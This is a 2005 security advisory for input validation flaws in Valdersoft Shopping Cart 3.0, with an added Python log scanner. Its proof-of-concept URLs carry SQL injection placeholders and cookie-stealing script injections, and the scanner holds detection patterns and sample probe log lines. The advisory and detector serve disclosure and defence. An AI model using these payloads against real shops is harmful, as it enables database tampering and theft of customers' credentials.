Valdersoft Shopping Cart Multiple Input Validation Vulnerabilities
BID:12916
Info
| Bugtraq ID: | 12916 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 28 2005 12:00AM |
| Updated: | Mar 28 2005 12:00AM |
| Credit: | Discovery of these issues is credited to Diabolic Crab. |
| Vulnerable: | Valdersoft Shopping Cart 3.0 |
| Not Vulnerable: | |
Discussion
Multiple input validation vulnerabilities reportedly affect Valdersoft Shopping Cart. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical actions.
An attacker may leverage these issues to carry out cross-site scripting and SQL injection attacks against the affected application. This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks.
Exploit / POC
No exploit is required; the following examples are available:
http://www.example.com/store/category.php?sid=CDFE279AC2AD08522DF1CF9B46475132&id='SQL_INJECTION
http://www.example.com/store/item.php?sid=CDFE279AC2AD08522DF1CF9B46475132&id='SQL_INJECTION
http://www.example.com/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&lang='SQL_INJECTION
http://www.example.com/store/search_result.php?sid=&searchTopCategoryID=&searchQuery='SQL_INJECTION&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=USD
http://www.example.com/store/search_result.php?sid=CDFE279AC2AD08522DF1CF9B46475132&searchTopCategoryID='SQL_INJECTION&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=USD
http://www.example.com/store/index.php?sid=CDFE279AC2AD08522DF1CF9B46475132&lang=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/store/search_result.php?sid=CDFE279AC2AD08522DF1CF9B46475132&searchTopCategoryID=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&searchQuery=&sid=CDFE279AC2AD08522DF1CF9B46475132&currency=USD
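Since no vendor patch is listed, a defender's first step is to spot these probes in web server logs. The following is an added detection example, not part of the original advisory or the Valdersoft product: it parses constructed Apache-style access log lines for the endpoints and parameters named in the proof-of-concept URLs above and flags values carrying the quote or script-tag patterns shown there. The log format, client addresses and timestamps are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoints and parameters named in the advisory's proof-of-concept URLs.
WATCHED = {
    "/store/category.php": {"id"},
    "/store/item.php": {"id"},
    "/store/index.php": {"lang"},
    "/store/search_result.php": {"searchQuery", "searchTopCategoryID"},
}
SQLI_RE = re.compile(r"'")                          # quote breaking out of a string literal
XSS_RE = re.compile(r"<\s*script|on\w+\s*=", re.I)  # script tag or event-handler attribute
# Apache common log format (an assumption about how the store is logged).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) HTTP/[\d.]+" (\d{3})')
# Constructed sample lines: two reproduce the advisory's probe patterns, one is benign.
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Mar/2005:10:15:02 +0000] "GET /store/category.php'
    '?sid=CDFE279AC2AD08522DF1CF9B46475132&id=%27SQL_INJECTION HTTP/1.1" 200 512',
    '203.0.113.7 - - [28/Mar/2005:10:15:09 +0000] "GET /store/index.php'
    '?sid=CDFE279AC2AD08522DF1CF9B46475132&lang=%22%3E%3Cscript%3Ealert(document.cookie)'
    '%3C/script%3E HTTP/1.1" 200 2048',
    '198.51.100.4 - - [28/Mar/2005:10:16:00 +0000] "GET /store/item.php'
    '?sid=CDFE279AC2AD08522DF1CF9B46475132&id=42 HTTP/1.1" 200 3310',
]

def analyse_line(line):
    """Return (client, path, parameter, reason) tuples for one access log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    client, _method, target, _status = m.groups()
    parts = urlsplit(target)
    watched = WATCHED.get(parts.path)
    if not watched:
        return []
    findings = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in watched:
            continue
        for value in values:
            value = unquote(value)  # parse_qs decoded once; a second pass catches double encoding
            if XSS_RE.search(value):
                findings.append((client, parts.path, name, "xss"))
            elif SQLI_RE.search(value):
                findings.append((client, parts.path, name, "sqli"))
    return findings

def scan(lines):
    return [f for line in lines for f in analyse_line(line)]
```

Running `scan(SAMPLE_LOG)` reports the SQL injection probe against `id` and the script injection against `lang`, and ignores the benign item request.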
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
References:
- Valdersoft Shopping Cart Homepage (Valdersoft)